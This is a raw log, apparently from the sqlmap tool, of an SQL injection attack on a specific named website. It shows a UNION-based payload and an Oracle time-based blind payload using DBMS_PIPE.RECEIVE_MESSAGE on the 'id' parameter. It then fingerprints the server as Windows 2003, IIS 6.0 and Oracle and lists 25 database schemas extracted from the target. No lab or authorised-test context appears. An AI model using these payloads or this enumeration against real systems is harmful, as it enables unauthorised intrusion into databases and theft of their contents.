    Title: Generic UNION query (NULL) - 3 columns
    Payload: lb=save&id=-1331 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(104)||CH
R(102)||CHR(105)||CHR(58)||CHR(70)||CHR(75)||CHR(119)||CHR(105)||CHR(67)||CHR(10
8)||CHR(69)||CHR(72)||CHR(106)||CHR(72)||CHR(58)||CHR(100)||CHR(100)||CHR(98)||C
HR(58) FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: lb=save&id=241 AND 4658=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(79)
||CHR(121)||CHR(82),5)
---
[07:31:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:31:40] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:31:40] [INFO] fetching database (schema) names
[07:31:40] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:31:40] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:31:40] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.sxjhjj.com'
[*] shutting down at 07:31:40